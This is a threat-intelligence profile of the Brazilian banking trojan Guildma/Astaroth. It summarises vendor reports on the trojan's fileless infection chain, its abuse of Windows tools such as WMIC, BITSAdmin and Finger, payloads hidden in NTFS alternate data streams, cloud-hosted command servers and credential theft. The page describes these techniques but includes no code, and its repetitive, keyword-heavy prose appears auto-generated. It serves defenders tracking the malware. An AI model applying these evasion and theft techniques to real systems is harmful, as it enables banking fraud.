Home/Threat Actor/Guildma / Astaroth
Threat Actor

Guildma / Astaroth

guildma_astaroth · latin_america_brazilian_organized_cybercrime · active since 2015

Guildma / Astaroth (canonical dual industry naming reflecting Avast naming Guildma + Cybereason naming Astaroth, confirmed same malware family per Avast Adolf Streda 2019 canonical dual-naming clarification analysis "almost certainly the same malware as that described by Cybereason as Astaroth, but analyzed here in greater detail".

Brazilian-origin highly- modular banking trojan + Remote Access Tool RAT + spyware + password stealer + information stealer active since at least 2015 per Avast estimate that "first versions of Guildma were created in 2015" with module encryption seed unchanged since late 2015) is a Latin American banking trojan operating signature Brazil - Latin America - US + Spain + Portugal global expansion since 2015 with Avast 2019 detected ~155,000 infection attempts (98% still in Brazil but targeting 130 banks + web services including Netflix + Facebook + Amazon + Google Mail globally)

standalone malware platform cluster paralleling grandoreiro + mekotio in Latin American banking trojan operators cell.

Brazilian-origin organized cybercrime attribution via Kaspersky Securelist canonical July 14, 2020 "The Tetrade: Brazilian banking malware goes global" by Fabio Assolini framework classification (Guildma + Javali + Melcoz + Grandoreiro four major Brazilian banking trojan families) + Microsoft Defender ATP Research Team canonical July 9, 2019 fileless Astaroth campaign disclosure ("completely 'lived off the land' throughout a complex attack chain that ran the info-stealing backdoor Astaroth directly in memory" per Microsoft Security Intelligence Twitter @MsftSecIntel) + Cybereason 2019 canonical Astaroth analysis + Cofense PDC September 2018 South American campaign disclosure (~8,000 machines compromised within single week)

cluster-defining fileless + LOLBin tradecraft with signature LOLBin abuse arsenal including WMIC (Windows Management Instrumentation Command-line with /Format parameter for XSL download + JavaScript execution per Microsoft ATP) + BITSAdmin (allowlisted Windows tool for additional module download, relied on for years to avoid detection per Kaspersky) + ExtExport (legitimate utility for malicious DLL loading) + Finger Windows utility (per Tempest SideChannel 2021, Windows utility for remote code execution) + historical aswrundll.exe Avast binary abuse (now blocked per Avast)

cluster-defining NTFS Alternate Data Streams (ADS) payload concealment tradecraft per Kaspersky November 2019 disclosure (payload storage in desktop.ini ADS hides files from Windows Explorer requiring DIR /R command for ADS display)

cluster- defining cloud-hosting C2 abuse including CloudFlare Workers + Amazon AWS + YouTube channels + Facebook pages for payload storage + C2 information concealment per Kaspersky.

DLL Search Order Hijacking malware binary launch + process hollowing inside svchost.exe per Kaspersky.

multi-language phishing tradecraft with Spanish + Portuguese + English spearphishing using LNK + VBS + ZIP + HTML/JavaScript attachments (COVID-19 themed including "Purchase invoice for alcohol gel: Guildma's trick for luring victims" per Kaspersky)

DGA generating ~200+ daily URLs using generic TLDs per Kaspersky newer Guildma 2020 versions.

comprehensive anti-analysis tradecraft (anti-debugging + anti-virtualization + anti-emulation + security tool detection for OllyDbg + WinDbg + Process Hacker + Process Monitor + Wireshark + force machine reboot on detection per Tempest)

comprehensive credential theft including banking credentials via fake pop-up overlays + browser password stores + SSH credentials + email credentials with HTTPS POST exfiltration per Armor.

Tempest SideChannel 2021 additional disclosure of XSS-vulnerable website exploitation as initial payload delivery (~10% of late January 2021 Astaroth campaigns)

Delphi programming language origin signature (typical Latin American banking trojan) with open-source RAT lineage (Delphi Remote Access PC + AmigoRAT + PureRAT) per Avast.

version 140+ continuous development per Avast 2019 + extended targeting Chile + Uruguay + Peru + Ecuador + Colombia + China + Europe per Kaspersky Tetrade framework.

cluster fills the most-fileless- LOLBin-tradecraft position in Latin American banking trojan operators cell.

canonical illustration of fileless + LOLBin abuse + NTFS ADS payload concealment + cloud-hosting C2 abuse + Tetrade framework signature cited in essentially all subsequent fileless malware + LOLBin abuse + Latin American banking trojan industry analyses through 2015-2026 period.

latin_america_brazilian_organized_cybercrime confidence: high 12 aliases
Sigma rules201 YARA rules0 Live IOCs0 CVEs exploited0

Profile

Guildma / Astaroth (canonical dual industry naming reflecting Avast naming Guildma + Cybereason naming Astaroth confirmed same malware family per Avast 2019 analysis; Brazilian-origin highly-modular banking trojan + Remote Access Tool RAT + spyware + password stealer + information stealer active since at least 2015) is a Latin American banking trojan operating Brazil
  • Latin America.
  • US + Spain + Portugal global expansion since 2015. Brazilian-origin organized cybercrime attribution via Kaspersky Tetrade framework canonical July 2020 classification (alongside Javali + Melcoz + Grandoreiro) + Avast 2019 canonical dual-naming clarification + Microsoft Defender ATP Research Team July 9, 2019 canonical fileless Astaroth campaign disclosure. Standalone malware platform cluster paralleling grandoreiro + mekotio in the Latin American banking trojan operators cell. Cluster-defining signature operational tradecraft: (1) Fileless infection chain (cluster-defining): per Microsoft Defender ATP: "completely 'lived off the land' throughout a complex attack chain that ran the info-stealing backdoor Astaroth directly in memory." (2) LOLBin abuse arsenal (cluster-defining): WMIC (Windows Management Instrumentation Command-line with /Format parameter for XSL download + JavaScript execution) + BITSAdmin (allowlisted Windows tool for additional module download) + ExtExport (legitimate utility for malicious DLL loading) + Finger (per Tempest 2021, Windows utility for remote code execution) + historical aswrundll.exe (Avast binary abuse, now blocked). (3) NTFS Alternate Data Streams (ADS) payload concealment (cluster-defining): per Kaspersky, payload storage in desktop.ini ADS hides files from Explorer (DIR /R required to display ADS). (4) Cloud-hosting C2 abuse (cluster-defining): CloudFlare Workers + Amazon AWS + YouTube channels + Facebook pages for payload storage + C2 information concealment. (5) DLL Search Order Hijacking + process hollowing: svchost.exe process hollowing for malicious payload execution per Kaspersky. (6) Multi-language phishing: Spanish + Portuguese + English spearphishing with LNK + VBS + ZIP + HTML/JavaScript attachments. (7) DGA (Domain Generation Algorithm): ~200+ daily URLs generated using generic TLDs per Kaspersky newer Guildma 2020 versions. (8) Anti-analysis tradecraft (signature): anti- debugging + anti-virtualization + anti-emulation + security tool detection (OllyDbg + WinDbg + Process Hacker + Process Monitor + Wireshark) + force machine reboot on detection per Tempest. (9) Comprehensive credential theft (signature): banking credentials via fake pop-up overlays + browser password stores + SSH credentials + email credentials.
Operational target profile per Avast 2019
  • 155,000 infection attempts detected in 2019 alone.
  • 98% still in Brazil at 2019 detection time.
  • 130 banks + web services including Netflix, Facebook, Amazon, Google Mail global expansion.
  • Brazil + Mexico + US + Spain + Portugal primary post-2019 expansion targets.
  • Chile + Uruguay + Peru + Ecuador + Colombia + China + Europe Tetrade framework targets Cluster-cell coherence:.
  • Kaspersky Tetrade framework member (signature): Guildma + Javali + Melcoz + Grandoreiro.
  • Delphi programming language origin (signature typical Latin American banking trojan): open-source RAT (Delphi Remote Access PC + AmigoRAT + PureRAT) lineage per Avast.
  • COVID-19 themed phishing (signature 2020): "Purchase invoice for alcohol gel" lure per Kaspersky.
  • Version 140+ continuous development (signature): per Avast 2019 The cluster fills the most-fileless-LOLBin-tradecraft position in the Latin American banking trojan operators cell.

Aliases

12
guildmaastarothguildma astarothguildma_malwareastaroth_malwareastaroth_trojanguildma brazilian banking trojanastaroth fileless banking trojanguildma kaspersky tetrade memberastaroth wmic lolbin abuseguildma astaroth ntfs ads payload concealmentguildma astaroth youtube facebook c2 abuse

Notable Campaigns

10
2022-2026Continued Industry Tracking 2022-2026
2021Tempest SideChannel New Astaroth Techniques (2021)
2020Kaspersky Tetrade Framework Canonical Classification (July 2020)
2019Cybereason Canonical Astaroth Disclosure (2019)
2019Microsoft Defender ATP Fileless Canonical Disclosure (July 9, 2019)
2019Avast Canonical 2019 Dual-Naming Clarification (Adolf Streda)
2019Guildma NTFS Alternate Data Streams (ADS) Innovation (November 2019)
2018Cofense PDC South American Campaign (September 2018)
2015-2026Continued Industry Reference Status (2015-2026)
2015Guildma Origin, Brazil-Only Targeting (2015)

Attribution & Reporting

Attributed by
Kaspersky GReAT (canonical July 2020 Tetrade framework disclosure, Fabio Assolini)Kaspersky Securelist (canonical Tetrade comprehensive analysis)Avast (canonical 2019 dual-naming clarification, Adolf Streda malware researcher)Microsoft Defender ATP Research Team (canonical July 9, 2019 fileless Astaroth campaign disclosure)Microsoft Security Intelligence (canonical @MsftSecIntel Twitter disclosure)Cybereason (canonical 2019 Astaroth analysis disclosure)Cofense Phishing Defense Center (canonical September 2018 South American campaign disclosure)Tempest SideChannel (canonical 2021 New Astaroth Techniques disclosure with Finger LOLBin + XSS exploitation)ESET WeLiveSecurity (canonical Latin American banking trojan series including Guildma coverage)Armor (canonical Astaroth banking trojan armor defense analysis)SecurityWeek (canonical Avast + Kaspersky reporting)SecurityAffairs (canonical Tetrade reporting)Bleeping Computer (canonical Microsoft fileless campaign reporting)Recorded Future (canonical Brazilian hacking scene analysis)MITRE ATT&CK Software S0373 (Astaroth)Malpedia Software Profile (Astaroth = Guildma)
Key reporting
reportKaspersky GReAT (Fabio Assolini): The Tetrade, Brazilian banking malware goes global (July 14, 2020), canonical Tetrade framework disclosure
reportAvast (Adolf Streda): canonical 2019 dual-naming clarification, Guildma = Astaroth analysis
reportMicrosoft Defender ATP Research Team: canonical July 9, 2019 fileless Astaroth campaign disclosure
reportMicrosoft Security Intelligence (@MsftSecIntel Twitter): canonical July 9, 2019 fileless disclosure
reportCybereason: canonical 2019 Astaroth analysis disclosure
reportCofense Phishing Defense Center: September 2018 South American campaign disclosure
reportTempest SideChannel: New Astaroth techniques focus on anti-detection measures (2021)
reportESET WeLiveSecurity: canonical Latin American banking trojan series
reportArmor: Astaroth banking trojan analysis (2025)
reportSecurityWeek: Guildma Malware Expands Targets Beyond Brazil (2019)
reportSecurityAffairs: Tetrade banking malware families target users worldwide
reportBleeping Computer: Microsoft Discovers Fileless Astaroth Trojan Campaign (July 2019)
reportRecorded Future: canonical Brazilian hacking scene analysis
reportMITRE ATT&CK Software S0373: Astaroth
reportMalpedia Software Profile: Astaroth (= Guildma)

Operational

State sponsor

Brazilian-origin organized cybercrime, Latin American banking trojan operator group operating with sophisticated fileless + LOLBin tradecraft. Operationally separate from state-sponsored APT activity. Attribution chain: (1) Kaspersky Tetrade framework canonical 2020 classification: per Kaspersky Securelist "The Tetrade: Brazilian banking malware goes global" (July 2020): Guildma classified alongside Javali + Melcoz + Grandoreiro as one of four major Brazilian banking trojan families.

Per Kaspersky: "The Brazilian cybercrime underground is recognized as the most focused on the development and commercialization of banking trojans." Guildma active since 2015, initially targeting Brazilian banking users only. (2) Avast canonical 2019 dual-naming clarification: per SecurityWeek + Avast research (Adolf Streda): Guildma "is almost certainly the same malware as that described by Cybereason as Astaroth, but analyzed here in greater detail." Operationally resolved Guildma = Astaroth naming convention dispute. Avast tracked 155,000 infection attempts in 2019 alone (98% in Brazil).

Per Avast: "We estimate that the first versions of Guildma were created in 2015", one of seeds used for module encryption key generation unchanged since late 2015. (3) Microsoft Defender ATP Research Team July 9, 2019 canonical fileless disclosure: per Microsoft Security Intelligence Twitter (@MsftSecIntel) + Bleeping Computer: "We recently unearthed a campaign that completely 'lived off the land' throughout a complex attack chain that ran the info-stealing backdoor Astaroth directly in memory." (4) Cybereason canonical 2019 Astaroth disclosure: Cybereason first canonical Astaroth disclosure with LOLBin abuse analysis + European/Brazilian targeting campaign observation. (5) Cofense PDC September 2018 South American campaign: per Bleeping Computer update: Cofense's Phishing Defense Center spotted malspam campaign distributing Astaroth in September 2018 exclusively targeting South American victims, with ~8,000 machines potentially compromised within a single week of attacks.

(6) Tempest 2021 New Astaroth Techniques disclosure (SideChannel): documented Astaroth/Guildma's use of Finger Windows utility as LOLBin + XSS-vulnerable website exploitation as initial payload delivery mechanism. (7) ESET WeLiveSecurity Latin American banking trojan series: ESET multi-year Latin American banking trojan series including Guildma coverage, tracking continuous expansion + development. Operational mission objective: Information-stealing banking trojan + Remote Access Tool (RAT) capability + financial credential collection + sensitive browser data theft (passwords/ credentials) + SSH credential theft + email credential theft.

Per Armor: "Information targeted by Astaroth includes financial data, sensitive browser data (passwords/ credentials), SSH, and email credentials. Upon retrieval, the information is typically encrypted, then exfiltrated via an HTTPS POST to the attacker's C2 server." The cluster fills the most-fileless-LOLBin-tradecraft position in Latin American banking trojan operators cell.

Motivations
banking_credential_theft_brazilian_origin_capability, fileless_lolbin_tradecraft_signature_demonstration_capability, information_stealing_password_collection_capability, rat_remote_access_tool_capability_for_post_credential_access, sensitive_browser_data_ssh_email_credential_collection, cloud_hosting_c2_evasion_via_youtube_facebook_cloudflare_aws, ntfs_alternate_data_streams_payload_concealment_tradecraft, 130_plus_banks_and_web_services_global_expansion_capability
Sectors
banking_financial_institutionsweb_services_netflix_facebook_amazon_google_mailonline_email_clientsbrowser_password_storescryptocurrency_wallets
Regions
brazillatin_america_broadlymexicounited_statesspainportugaleurope_broadlysouth_america_broadlychileuruguayperuecuadorcolombia

Techniques Used

60
T1003T1003.001T1005T1010T1014T1016T1018T1020T1027T1027.002T1027.005T1027.011T1027.013T1029T1033T1036T1036.001T1036.005T1037T1037.001T1041T1047T1053T1053.005T1055T1055.012T1056T1056.001T1056.002T1057T1059T1059.001T1059.003T1059.005T1059.007T1068T1069T1070T1070.004T1071T1071.001T1074T1078T1082T1083T1087T1090T1090.001T1090.002T1095T1102T1102.001T1102.002T1106T1110T1112T1113T1114T1115T1119

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)55/60 · 91%
Analytics (MITRE CAR)28/60 · 46%
Runtime / container (Falco)5/60 · 8%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)14/60 · 23%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
SSH EMAIL CREDENTIALS THEFTSVCHOST EXE PROCESS HOLLOWING PAYLOAD EXECUTION
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKMITRE searchMalpediaGoogle
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin